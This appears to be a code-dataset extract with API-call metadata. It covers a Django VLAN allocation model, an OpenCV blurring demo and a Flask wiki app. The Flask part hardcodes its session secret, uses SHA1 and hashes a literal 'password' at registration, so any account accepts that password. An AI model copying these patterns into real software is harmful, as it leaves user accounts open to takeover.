# list of length 4096 containing either 0 (not reserved) or 1 (reserved)
reserved_vlans = models.TextField()
block_size = models.IntegerField()
# True if the lab allows two different users to have the same private vlans
# if they use QinQ or a vxlan overlay, for example
allow_overlapping = models.BooleanField()
def get_vlans(self, count=1):
"""
Return the IDs of available vlans as a list[int], but does not reserve them.
Will throw index exception if not enough vlans are available.
Always returns a list of ints
"""
allocated = []
vlans = json.loads(self.vlans)
reserved = json.loads(self.reserved_vlans)
for i in range(0, len(vlans) - 1):
if len(allocated) >= count:
break
if vlans[i] == 0 and self.allow_overlapping is False:
continue
if reserved[i] == 1:
continue
# vlan is available and not reserved, so safe to add
allocated.append(i)
continue
if len(allocated) != count:
raise ResourceAvailabilityException("can't allocate the vlans requested")
return allocated
def get_public_vlan(self):
"""Return reference to an available public network without reserving it."""
return PublicNetwork.objects.filter(lab=self.lab_set.first(), in_use=False).first()
def reserve_public_vlan(self, vlan):
"""Reserves the Public Network that has the given vlan."""
net = PublicNetwork.objects.get(lab=self.lab_set.first(), vlan=vlan, in_use=False)
net.in_use = True
net.save()
def release_public_vlan(self, vlan):
"""Un-reserves a public network with the given vlan."""
net = PublicNetwork.objects.get(lab=self.lab_set.first(), vlan=vlan, in_use=True)
net.in_use = False
net.save()
def public_vlan_is_available(self, vlan):
"""
Whether the public vlan is available.
returns true if the network with the given vlan is free to use,
False otherwise
"""
net = PublicNetwork.objects.get(lab=self.lab_set.first(), vlan=vlan)
return not net.in_use
def is_available(self, vlans):
"""
If the vlans are available.
'vlans' is either a single vlan id integer or a list of integers
will return true (available) or false
"""
if self.allow_overlapping:
return True
reserved = json.loads(self.reserved_vlans)
vlan_master_list = json.loads(self.vlans)
try:
iter(vlans)
except Exception:
vlans = [vlans]
for vlan in vlans:
if not vlan_master_list[vlan] or reserved[vlan]:
return False
return True
def release_vlans(self, vlans):
"""
Make the vlans available for another booking.
'vlans' is either a single vlan id integer or a list of integers
will make the vlans available
doesnt return a value
"""
my_vlans = json.loads(self.vlans)
try:
iter(vlans)
except Exception:
vlans = [vlans]
for vlan in vlans:
my_vlans[vlan] = 1
self.vlans = json.dumps(my_vlans)
self.save()
def reserve_vlans(self, vlans):
"""
Reserves all given vlans or throws a ValueError.
vlans can be an integer or a list of integers.
"""
my_vlans = json.loads(self.vlans)
reserved = json.loads(self.reserved_vlans)
try:
iter(vlans)
except Exception:
vlans = [vlans]
vlans = set(vlans)
for vlan in vlans:
if my_vlans[vlan] == 0 or reserved[vlan] == 1:
raise ValueError("vlan " + str(vlan) + " is not available")
my_vlans[vlan] = 0
self.vlans = json.dumps(my_vlans)
self.save()
class Lab(models.Model):
"""
Model representing a Hosting Lab.
Anybody that wants to host resources for LaaS needs to have a Lab model
We associate hardware with Labs so we know what is available and where.
"""
lab_user = models.OneToOneField(User, on_delete=models.CASCADE)
name = models.CharField(max_length=200, primary_key=True, unique=True, null=False, blank=False)
contact_email = models.EmailField(max_length=200, null=True, blank=True)
contact_phone = models.CharField(max_length=20, null=True, blank=True)
status = models.IntegerField(default=LabStatus.UP)
vlan_manager = models.ForeignKey(VlanManager, on_delete=models.CASCADE, null=True)
location = models.TextField(default="unknown")
# This token must apear in API requests from this lab
api_token = models.CharField(max_length=50)
description = models.CharField(max_length=240)
lab_info_link = models.URLField(null=True)
project = models.CharField(default='LaaS', max_length=100)
@staticmethod
def make_api_token():
"""Generate random 45 character string for API token."""
alphabet = "<KEY>"
key = ""
for i in range(45):
key += random.choice(alphabet)
return key
def get_available_resources(self):
# Cannot import model normally due to ciruclar import
Server = apps.get_model('resource_inventory', 'Server') # TODO: Find way to import ResourceQuery
resources = [str(resource.profile) for resource in Server.objects.filter(lab=self, working=True, booked=False)]
return dict(Counter(resources))
def __str__(self):
return self.name
class PublicNetwork(models.Model):
"""L2/L3 network that can reach the internet."""
vlan = models.IntegerField()
lab = models.ForeignKey(Lab, on_delete=models.CASCADE)
in_use = models.BooleanField(default=False)
cidr = models.CharField(max_length=50, default="0.0.0.0/0")
gateway = models.CharField(max_length=50, default="0.0.0.0")
class Downtime(models.Model):
"""
A Downtime event.
Labs can create Downtime objects so the dashboard can
alert users that the lab is down, etc
"""
start = models.DateTimeField()
end = models.DateTimeField()
lab = models.ForeignKey(Lab, on_delete=models.CASCADE)
description = models.TextField(default="This lab will be down for maintenance")
def save(self, *args, **kwargs):
if self.start >= self.end:
raise ValueError('Start date is after end date')
# check for overlapping downtimes
overlap_start = Downtime.objects.filter(lab=self.lab, start__gt=self.start, start__lt=self.end).exists()
overlap_end = Downtime.objects.filter(lab=self.lab, end__lt=self.end, end__gt=self.start).exists()
if overlap_start or overlap_end:
raise ValueError('Overlapping Downtime')
return super(Downtime, self).save(*args, **kwargs)
| [
"django.db.models.OneToOneField",
"django.db.models.EmailField",
"json.loads",
"random.choice",
"django.db.models.TextField",
"django.db.models.IntegerField",
"django.db.models.ForeignKey",
"json.dumps",
"django.db.models.FileField",
"django.db.models.DateTimeField",
"django.db.models.BooleanFie... | [((1129, 1181), 'django.db.models.OneToOneField', 'models.OneToOneField', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (1149, 1181), False, 'from django.db import models\n'), ((1197, 1257), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'blank': '(False)', 'default': '"""UTC"""'}), "(max_length=100, blank=False, default='UTC')\n", (1213, 1257), False, 'from django.db import models\n'), ((1279, 1339), 'django.db.models.FileField', 'models.FileField', ([], {'upload_to': 'upload_to', 'null': '(True)', 'blank': '(True)'}), '(upload_to=upload_to, null=True, blank=True)\n', (1295, 1339), False, 'from django.db import models\n'), ((1361, 1421), 'django.db.models.FileField', 'models.FileField', ([], {'upload_to': 'upload_to', 'null': '(True)', 'blank': '(True)'}), '(upload_to=upload_to, null=True, blank=True)\n', (1377, 1421), False, 'from django.db import models\n'), ((1439, 1503), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(300)', 'blank': '(False)', 'default': '"""<EMAIL>"""'}), "(max_length=300, blank=False, default='<EMAIL>')\n", (1455, 1503), False, 'from django.db import models\n'), ((1518, 1563), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'blank': '(False)'}), '(max_length=200, blank=False)\n', (1534, 1563), False, 'from django.db import models\n'), ((1583, 1629), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1024)', 'blank': '(False)'}), '(max_length=1024, blank=False)\n', (1599, 1629), False, 'from django.db import models\n'), ((1649, 1695), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1024)', 'blank': '(False)'}), '(max_length=1024, blank=False)\n', (1665, 1695), False, 'from django.db import models\n'), ((1712, 1779), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(True)', 'blank': '(True)', 'default': '""""""'}), "(max_length=100, null=True, blank=True, default='')\n", (1728, 1779), False, 'from django.db import models\n'), ((1797, 1864), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(True)', 'blank': '(True)', 'default': '""""""'}), "(max_length=100, null=True, blank=True, default='')\n", (1813, 1864), False, 'from django.db import models\n'), ((1889, 1923), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (1908, 1923), False, 'from django.db import models\n'), ((1943, 1977), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (1962, 1977), False, 'from django.db import models\n'), ((2393, 2411), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (2409, 2411), False, 'from django.db import models\n'), ((2510, 2528), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (2526, 2528), False, 'from django.db import models\n'), ((2547, 2568), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (2566, 2568), False, 'from django.db import models\n'), ((2729, 2750), 'django.db.models.BooleanField', 'models.BooleanField', ([], {}), '()\n', (2748, 2750), False, 'from django.db import models\n'), ((6671, 6723), 'django.db.models.OneToOneField', 'models.OneToOneField', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (6691, 6723), False, 'from django.db import models\n'), ((6735, 6827), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'primary_key': '(True)', 'unique': '(True)', 'null': '(False)', 'blank': '(False)'}), '(max_length=200, primary_key=True, unique=True, null=False,\n blank=False)\n', (6751, 6827), False, 'from django.db import models\n'), ((6844, 6900), 'django.db.models.EmailField', 'models.EmailField', ([], {'max_length': '(200)', 'null': '(True)', 'blank': '(True)'}), '(max_length=200, null=True, blank=True)\n', (6861, 6900), False, 'from django.db import models\n'), ((6921, 6975), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(20)', 'null': '(True)', 'blank': '(True)'}), '(max_length=20, null=True, blank=True)\n', (6937, 6975), False, 'from django.db import models\n'), ((6989, 7030), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': 'LabStatus.UP'}), '(default=LabStatus.UP)\n', (7008, 7030), False, 'from django.db import models\n'), ((7050, 7117), 'django.db.models.ForeignKey', 'models.ForeignKey', (['VlanManager'], {'on_delete': 'models.CASCADE', 'null': '(True)'}), '(VlanManager, on_delete=models.CASCADE, null=True)\n', (7067, 7117), False, 'from django.db import models\n'), ((7133, 7168), 'django.db.models.TextField', 'models.TextField', ([], {'default': '"""unknown"""'}), "(default='unknown')\n", (7149, 7168), False, 'from django.db import models\n'), ((7243, 7274), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (7259, 7274), False, 'from django.db import models\n'), ((7293, 7325), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(240)'}), '(max_length=240)\n', (7309, 7325), False, 'from django.db import models\n'), ((7346, 7372), 'django.db.models.URLField', 'models.URLField', ([], {'null': '(True)'}), '(null=True)\n', (7361, 7372), False, 'from django.db import models\n'), ((7387, 7435), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""LaaS"""', 'max_length': '(100)'}), "(default='LaaS', max_length=100)\n", (7403, 7435), False, 'from django.db import models\n'), ((8199, 8220), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (8218, 8220), False, 'from django.db import models\n'), ((8231, 8279), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Lab'], {'on_delete': 'models.CASCADE'}), '(Lab, on_delete=models.CASCADE)\n', (8248, 8279), False, 'from django.db import models\n'), ((8293, 8327), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (8312, 8327), False, 'from django.db import models\n'), ((8339, 8391), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'default': '"""0.0.0.0/0"""'}), "(max_length=50, default='0.0.0.0/0')\n", (8355, 8391), False, 'from django.db import models\n'), ((8406, 8456), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'default': '"""0.0.0.0"""'}), "(max_length=50, default='0.0.0.0')\n", (8422, 8456), False, 'from django.db import models\n'), ((8641, 8663), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (8661, 8663), False, 'from django.db import models\n'), ((8674, 8696), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (8694, 8696), False, 'from django.db import models\n'), ((8707, 8755), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Lab'], {'on_delete': 'models.CASCADE'}), '(Lab, on_delete=models.CASCADE)\n', (8724, 8755), False, 'from django.db import models\n'), ((8774, 8839), 'django.db.models.TextField', 'models.TextField', ([], {'default': '"""This lab will be down for maintenance"""'}), "(default='This lab will be down for maintenance')\n", (8790, 8839), False, 'from django.db import models\n'), ((3043, 3065), 'json.loads', 'json.loads', (['self.vlans'], {}), '(self.vlans)\n', (3053, 3065), False, 'import json\n'), ((3085, 3116), 'json.loads', 'json.loads', (['self.reserved_vlans'], {}), '(self.reserved_vlans)\n', (3095, 3116), False, 'import json\n'), ((4953, 4984), 'json.loads', 'json.loads', (['self.reserved_vlans'], {}), '(self.reserved_vlans)\n', (4963, 4984), False, 'import json\n'), ((5012, 5034), 'json.loads', 'json.loads', (['self.vlans'], {}), '(self.vlans)\n', (5022, 5034), False, 'import json\n'), ((5540, 5562), 'json.loads', 'json.loads', (['self.vlans'], {}), '(self.vlans)\n', (5550, 5562), False, 'import json\n'), ((5735, 5755), 'json.dumps', 'json.dumps', (['my_vlans'], {}), '(my_vlans)\n', (5745, 5755), False, 'import json\n'), ((5969, 5991), 'json.loads', 'json.loads', (['self.vlans'], {}), '(self.vlans)\n', (5979, 5991), False, 'import json\n'), ((6012, 6043), 'json.loads', 'json.loads', (['self.reserved_vlans'], {}), '(self.reserved_vlans)\n', (6022, 6043), False, 'import json\n'), ((6380, 6400), 'json.dumps', 'json.dumps', (['my_vlans'], {}), '(my_vlans)\n', (6390, 6400), False, 'import json\n'), ((7799, 7845), 'django.apps.apps.get_model', 'apps.get_model', (['"""resource_inventory"""', '"""Server"""'], {}), "('resource_inventory', 'Server')\n", (7813, 7845), False, 'from django.apps import apps\n'), ((3548, 3615), 'dashboard.exceptions.ResourceAvailabilityException', 'ResourceAvailabilityException', (['"""can\'t allocate the vlans requested"""'], {}), '("can\'t allocate the vlans requested")\n', (3577, 3615), False, 'from dashboard.exceptions import ResourceAvailabilityException\n'), ((7637, 7660), 'random.choice', 'random.choice', (['alphabet'], {}), '(alphabet)\n', (7650, 7660), False, 'import random\n'), ((8028, 8046), 'collections.Counter', 'Counter', (['resources'], {}), '(resources)\n', (8035, 8046), False, 'from collections import Counter\n')] |
# Blurring and Sharpening Images
# Import Computer Vision package - cv2
import cv2
# Import Numerical Python package - numpy as np
import numpy as np
# Read the image using imread built-in function
image = cv2.imread('image_6.jpg')
# Display original image using imshow built-in function
cv2.imshow("Original", image)
# Wait until any key is pressed
cv2.waitKey(0)
# Blurring images: Averaging, cv2.blur built-in function
# Averaging: Convolving image with normalized box filter
# Convolution: Mathematical operation on 2 functions which produces third function.
# Normalized box filter having size 3 x 3 would be:
# (1/9) [[1, 1, 1],
# [1, 1, 1],
# [1, 1, 1]]
blur = cv2.blur(image,(9,9)) # (9 x 9) filter is used
# Display blurred image
cv2.imshow('Blurred', blur)
# Wait until any key is pressed
cv2.waitKey(0)
# Sharpening images: Emphasizes edges in an image
kernel = np.array([[-1,-1,-1],
[-1,9,-1],
[-1,-1,-1]])
# If we don't normalize to 1, image would be brighter or darker respectively
# cv2.filter2D is the built-in function used for sharpening images
# cv2.filter2D(image, ddepth, kernel)
sharpened = cv2.filter2D(image, -1, kernel)
# ddepth = -1, sharpened images will have same depth as original image
# Display sharpenend image
cv2.imshow('Sharpened', sharpened)
# Wait untill any key is pressed
cv2.waitKey(0)
# Close all windows
cv2.destroyAllWindows()
| [
"cv2.filter2D",
"cv2.imshow",
"numpy.array",
"cv2.destroyAllWindows",
"cv2.waitKey",
"cv2.blur",
"cv2.imread"
] | [((218, 243), 'cv2.imread', 'cv2.imread', (['"""image_6.jpg"""'], {}), "('image_6.jpg')\n", (228, 243), False, 'import cv2\n'), ((304, 333), 'cv2.imshow', 'cv2.imshow', (['"""Original"""', 'image'], {}), "('Original', image)\n", (314, 333), False, 'import cv2\n'), ((370, 384), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (381, 384), False, 'import cv2\n'), ((704, 727), 'cv2.blur', 'cv2.blur', (['image', '(9, 9)'], {}), '(image, (9, 9))\n', (712, 727), False, 'import cv2\n'), ((780, 807), 'cv2.imshow', 'cv2.imshow', (['"""Blurred"""', 'blur'], {}), "('Blurred', blur)\n", (790, 807), False, 'import cv2\n'), ((844, 858), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (855, 858), False, 'import cv2\n'), ((924, 975), 'numpy.array', 'np.array', (['[[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]]'], {}), '([[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]])\n', (932, 975), True, 'import numpy as np\n'), ((1242, 1273), 'cv2.filter2D', 'cv2.filter2D', (['image', '(-1)', 'kernel'], {}), '(image, -1, kernel)\n', (1254, 1273), False, 'import cv2\n'), ((1377, 1411), 'cv2.imshow', 'cv2.imshow', (['"""Sharpened"""', 'sharpened'], {}), "('Sharpened', sharpened)\n", (1387, 1411), False, 'import cv2\n'), ((1449, 1463), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1460, 1463), False, 'import cv2\n'), ((1488, 1511), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1509, 1511), False, 'import cv2\n')] |
from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for
import MySQLdb.cursors
import hashlib
import html
import json
import math
import os
import pathlib
import random
import re
import string
import urllib
import sys
from werkzeug.contrib.profiler import ProfilerMiddleware, MergeStream
static_folder = pathlib.Path(__file__).resolve().parent.parent / 'public'
app = Flask(__name__, static_folder=str(static_folder), static_url_path='')
app.secret_key = 'tonymoris'
f = open('/home/isucon/profiler.log', 'w')
stream = MergeStream(sys.stdout, f)
app.config['PROFILE'] = True
app.wsgi_app = ProfilerMiddleware(app.wsgi_app, stream, sort_by=('time', 'calls'))
keywords_cache = None
keyword_re_cache = None
# app.logger.critical('this is a CRITICAL message')
_config = {
'db_host': os.environ.get('ISUDA_DB_HOST', 'localhost'),
'db_port': int(os.environ.get('ISUDA_DB_PORT', '3306')),
'db_user': os.environ.get('ISUDA_DB_USER', 'root'),
'db_password': os.environ.get('ISUDA_DB_PASSWORD', ''),
'isutar_origin': os.environ.get('ISUTAR_ORIGIN', 'http://localhost:5001'),
'isupam_origin': os.environ.get('ISUPAM_ORIGIN', 'http://localhost:5050'),
}
def config(key):
if key in _config:
return _config[key]
else:
raise "config value of %s undefined" % key
def dbh_isuda():
if hasattr(request, 'isuda_db'):
return request.isuda_db
else:
request.isuda_db = MySQLdb.connect(**{
'host': config('db_host'),
'port': config('db_port'),
'user': config('db_user'),
'passwd': config('db_password'),
'db': 'isuda',
'charset': 'utf8mb4',
'cursorclass': MySQLdb.cursors.DictCursor,
'autocommit': True,
})
cur = request.isuda_db.cursor()
cur.execute("SET SESSION sql_mode='TRADITIONAL,NO_AUTO_VALUE_ON_ZERO,ONLY_FULL_GROUP_BY'")
cur.execute('SET NAMES utf8mb4')
return request.isuda_db
def dbh_isutar():
if hasattr(request, 'isutar_db'):
return request.isutar_db
else:
request.isutar_db = MySQLdb.connect(**{
'host': os.environ.get('ISUTAR_DB_HOST', 'localhost'),
'port': int(os.environ.get('ISUTAR_DB_PORT', '3306')),
'user': os.environ.get('ISUTAR_DB_USER', 'root'),
'passwd': os.environ.get('ISUTAR_DB_PASSWORD', ''),
'db': 'isutar',
'charset': 'utf8mb4',
'cursorclass': MySQLdb.cursors.DictCursor,
'autocommit': True,
})
cur = request.isutar_db.cursor()
cur.execute("SET SESSION sql_mode='TRADITIONAL,NO_AUTO_VALUE_ON_ZERO,ONLY_FULL_GROUP_BY'")
cur.execute('SET NAMES utf8mb4')
return request.isutar_db
@app.teardown_request
def close_db(exception=None):
if hasattr(request, 'db'):
request.db.close()
@app.template_filter()
def ucfirst(str):
return str[0].upper() + str[-len(str) + 1:]
def set_name(func):
import functools
@functools.wraps(func)
def wrapper(*args, **kwargs):
if "user_id" in session:
request.user_id = user_id = session['user_id']
cur = dbh_isuda().cursor()
cur.execute('SELECT name FROM user WHERE id = %s', (user_id, ))
user = cur.fetchone()
if user is None:
abort(403)
request.user_name = user['name']
return func(*args, **kwargs)
return wrapper
def authenticate(func):
import functools
@functools.wraps(func)
def wrapper(*args, **kwargs):
if not hasattr(request, 'user_id'):
abort(403)
return func(*args, **kwargs)
return wrapper
@app.route('/initialize')
def get_initialize():
global keywords_cache
global keyword_re_cache
keywords_cache = None
keyword_re_cache = None
cur = dbh_isuda().cursor()
cur.execute('DELETE FROM entry WHERE id > 7101')
origin = config('isutar_origin')
urllib.request.urlopen(origin + '/initialize')
return jsonify(result='ok')
@app.route('/')
@set_name
def get_index():
PER_PAGE = 10
page = int(request.args.get('page', '1'))
cur = dbh_isuda().cursor()
cur.execute('SELECT * FROM entry ORDER BY updated_at DESC LIMIT %s OFFSET %s', (PER_PAGE, PER_PAGE * (page - 1),))
entries = cur.fetchall()
for entry in entries:
entry['html'] = htmlify(entry['description'])
entry['stars'] = load_stars(entry['keyword'])
cur.execute('SELECT COUNT(*) AS count FROM entry')
row = cur.fetchone()
total_entries = row['count']
last_page = int(math.ceil(total_entries / PER_PAGE))
pages = range(max(1, page - 5), min(last_page, page + 5) + 1)
return render_template('index.html', entries=entries, page=page, last_page=last_page, pages=pages)
@app.route('/robots.txt')
def get_robot_txt():
abort(404)
@app.route('/keyword', methods=['POST'])
@set_name
@authenticate
def create_keyword():
global keywords_cache
global keyword_re_cache
keyword = request.form['keyword']
if keyword is None or len(keyword) == 0:
abort(400)
if keywords_cache is not None:
keywords_cache.add(keyword)
keyword_re_cache = None
user_id = request.user_id
description = request.form['description']
if is_spam_contents(description) or is_spam_contents(keyword):
abort(400)
cur = dbh_isuda().cursor()
sql = """
INSERT INTO entry (author_id, keyword, description, created_at, updated_at)
VALUES (%s,%s,%s,NOW(), NOW())
ON DUPLICATE KEY UPDATE
author_id = %s, keyword = %s, description = %s, updated_at = NOW()
"""
cur.execute(sql, (user_id, keyword, description, user_id, keyword, description))
return redirect('/')
@app.route('/register')
@set_name
def get_register():
return render_template('authenticate.html', action='register')
@app.route('/register', methods=['POST'])
def post_register():
name = request.form['name']
pw = request.form['password']
if name is None or name == '' or pw is None or pw == '':
abort(400)
user_id = register(dbh_isuda().cursor(), name, pw)
session['user_id'] = user_id
return redirect('/')
def register(cur, user, password):
salt = random_string(20)
cur.execute("INSERT INTO user (name, salt, password, created_at) VALUES (%s, %s, %s, NOW())",
(user, salt, hashlib.sha1((salt + "password").encode('utf-8')).hexdigest(),))
cur.execute("SELECT LAST_INSERT_ID() AS last_insert_id")
return cur.fetchone()['last_insert_id']
def random_string(n):
return ''.join([random.choice(string.ascii_letters + string.digits) for i in range(n)])
@app.route('/login')
@set_name
def get_login():
return render_template('authenticate.html', action='login')
@app.route('/login', methods=['POST'])
def post_login():
name = request.form['name']
cur = dbh_isuda().cursor()
cur.execute("SELECT * FROM user WHERE name = %s", (name, ))
row = cur.fetchone()
if row is None or row['password'] != hashlib.sha1((row['salt'] + request.form['password']).encode('utf-8')).hexdigest():
abort(403)
session['user_id'] = row['id']
return redirect('/')
@app.route('/logout')
def get_logout():
session.pop('user_id', None)
return redirect('/')
@app.route('/keyword/<keyword>')
@set_name
def get_keyword(keyword):
if keyword == '':
abort(400)
cur = dbh_isuda().cursor()
cur.execute('SELECT * FROM entry WHERE keyword = %s', (keyword,))
entry = cur.fetchone()
if entry is None:
abort(404)
entry['html'] = htmlify(entry['description'])
entry['stars'] = load_stars(entry['keyword'])
return render_template('keyword.html', entry=entry)
@app.route('/keyword/<keyword>', methods=['POST'])
@set_name
@authenticate
def delete_keyword(keyword):
global keywords_cache
global keyword_re_cache
if keyword == '':
abort(400)
if keywords_cache is not None and keyword in keywords_cache:
keywords_cache.remove(keyword)
keyword_re_cache = None
cur = dbh_isuda().cursor()
cur.execute('SELECT keyword FROM entry WHERE keyword = %s', (keyword, ))
row = cur.fetchone()
if row is None:
abort(404)
cur.execute('DELETE FROM entry WHERE keyword = %s', (keyword,))
return redirect('/')
def make_keyword_list():
global keywords_cache
if keywords_cache is not None:
return list(keywords_cache)
cur = dbh_isuda().cursor()
cur.execute('SELECT keyword FROM entry ORDER BY CHARACTER_LENGTH(keyword) DESC')
keywords = list()
for k in cur.fetchall():
keywords.append(k['keyword'])
keywords_cache = set(keywords)
return keywords
def make_keyword_re(keywords):
global keyword_re_cache
if keyword_re_cache is not None:
return keyword_re_cache
keyword_re_cache = re.compile("(%s)" % '|'.join([re.escape(k) for k in keywords]))
return keyword_re_cache
def htmlify(content):
if content is None or content == '':
return ''
# cur = dbh_isuda().cursor()
# cur.execute('SELECT * FROM entry ORDER BY CHARACTER_LENGTH(keyword) DESC')
# keywords = cur.fetchall()
keywords = make_keyword_list()
keyword_re = make_keyword_re(keywords)
kw2sha = {}
def replace_keyword(m):
kw2sha[m.group(0)] = "isuda_%s" % hashlib.sha1(m.group(0).encode('utf-8')).hexdigest()
return kw2sha[m.group(0)]
result = re.sub(keyword_re, replace_keyword, content)
result = html.escape(result)
for kw, hash in kw2sha.items():
url = url_for('get_keyword', keyword=kw)
link = "<a href=\"%s\">%s</a>" % (url, html.escape(kw))
result = re.sub(re.compile(hash), link, result)
return re.sub(re.compile("\n"), "<br />", result)
def get_stars(keyword):
cur = dbh_isutar().cursor()
app.logger.critical('keyword = ' + keyword)
cur.execute('SELECT * FROM star WHERE keyword = %s', (keyword, ))
res = cur.fetchall()
return res
def load_stars(keyword):
# cur = dbh_isutar().cursor()
# cur.execute('SELECT * FROM star WHERE keyword = %s', (keyword, ))
# res = cur.fetchall()
# return res
origin = config('isutar_origin')
url = "%s/stars" % origin
params = urllib.parse.urlencode({'keyword': keyword})
with urllib.request.urlopen(url + "?%s" % params) as res:
data = json.loads(res.read().decode('utf-8'))
return data['stars']
def is_spam_contents(content):
with urllib.request.urlopen(config('isupam_origin'), urllib.parse.urlencode({"content": content}).encode('utf-8')) as res:
data = json.loads(res.read().decode('utf-8'))
return not data['valid']
return False
if __name__ == "__main__":
app.run()
| [
"flask.render_template",
"flask.request.args.get",
"re.escape",
"re.compile",
"flask.request.isuda_db.cursor",
"urllib.parse.urlencode",
"flask.session.pop",
"html.escape",
"flask.jsonify",
"flask.request.isutar_db.cursor",
"werkzeug.contrib.profiler.MergeStream",
"pathlib.Path",
"functools.... | [((560, 586), 'werkzeug.contrib.profiler.MergeStream', 'MergeStream', (['sys.stdout', 'f'], {}), '(sys.stdout, f)\n', (571, 586), False, 'from werkzeug.contrib.profiler import ProfilerMiddleware, MergeStream\n'), ((631, 698), 'werkzeug.contrib.profiler.ProfilerMiddleware', 'ProfilerMiddleware', (['app.wsgi_app', 'stream'], {'sort_by': "('time', 'calls')"}), "(app.wsgi_app, stream, sort_by=('time', 'calls'))\n", (649, 698), False, 'from werkzeug.contrib.profiler import ProfilerMiddleware, MergeStream\n'), ((836, 880), 'os.environ.get', 'os.environ.get', (['"""ISUDA_DB_HOST"""', '"""localhost"""'], {}), "('ISUDA_DB_HOST', 'localhost')\n", (850, 880), False, 'import os\n'), ((970, 1009), 'os.environ.get', 'os.environ.get', (['"""ISUDA_DB_USER"""', '"""root"""'], {}), "('ISUDA_DB_USER', 'root')\n", (984, 1009), False, 'import os\n'), ((1032, 1071), 'os.environ.get', 'os.environ.get', (['"""ISUDA_DB_PASSWORD"""', '""""""'], {}), "('ISUDA_DB_PASSWORD', '')\n", (1046, 1071), False, 'import os\n'), ((1094, 1150), 'os.environ.get', 'os.environ.get', (['"""ISUTAR_ORIGIN"""', '"""http://localhost:5001"""'], {}), "('ISUTAR_ORIGIN', 'http://localhost:5001')\n", (1108, 1150), False, 'import os\n'), ((1173, 1229), 'os.environ.get', 'os.environ.get', (['"""ISUPAM_ORIGIN"""', '"""http://localhost:5050"""'], {}), "('ISUPAM_ORIGIN', 'http://localhost:5050')\n", (1187, 1229), False, 'import os\n'), ((3077, 3098), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (3092, 3098), False, 'import functools\n'), ((3585, 3606), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (3600, 3606), False, 'import functools\n'), ((4049, 4095), 'urllib.request.urlopen', 'urllib.request.urlopen', (["(origin + '/initialize')"], {}), "(origin + '/initialize')\n", (4071, 4095), False, 'import urllib\n'), ((4107, 4127), 'flask.jsonify', 'jsonify', ([], {'result': '"""ok"""'}), "(result='ok')\n", (4114, 4127), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((4800, 4896), 'flask.render_template', 'render_template', (['"""index.html"""'], {'entries': 'entries', 'page': 'page', 'last_page': 'last_page', 'pages': 'pages'}), "('index.html', entries=entries, page=page, last_page=\n last_page, pages=pages)\n", (4815, 4896), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((4945, 4955), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (4950, 4955), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((5840, 5853), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (5848, 5853), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((5921, 5976), 'flask.render_template', 'render_template', (['"""authenticate.html"""'], {'action': '"""register"""'}), "('authenticate.html', action='register')\n", (5936, 5976), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((6288, 6301), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (6296, 6301), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((6842, 6894), 'flask.render_template', 'render_template', (['"""authenticate.html"""'], {'action': '"""login"""'}), "('authenticate.html', action='login')\n", (6857, 6894), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7297, 7310), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (7305, 7310), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7357, 7385), 'flask.session.pop', 'session.pop', (['"""user_id"""', 'None'], {}), "('user_id', None)\n", (7368, 7385), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, url_for\n'), ((7397, 7410), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (7405, 7410), False, 'from flask import Flask, request, jsonify, abort, render_template, redirect, session, 